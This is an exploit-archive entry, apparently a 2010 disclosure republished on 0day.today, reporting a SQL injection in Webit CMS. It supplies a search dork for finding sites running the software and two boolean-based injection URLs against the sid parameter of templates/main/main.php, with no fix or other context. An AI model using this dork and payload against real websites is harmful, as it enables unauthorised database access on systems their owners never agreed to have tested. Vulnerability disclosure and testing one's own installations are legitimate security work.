id: 12393
date: 05/25/2010
title: Webit Cms SQL Injection Vulnerability
author: CoBRa_21
cves: 

=====================================
Webit Cms SQL Injection Vulnerability
=====================================


Author: CoBRa_21
  
Script Home: http://www.webitcms.gr
 
Dork: powered by webit! cms
 
-------------------------------------------------------------------------------------------
  
Sql Injection:
  
http://localhost/[path]/templates/main/main.php?sid=426+and+1=1
 
http://localhost/[path]/templates/main/main.php?sid=426+and+1=2



#  0day.today [2023-03-27]  #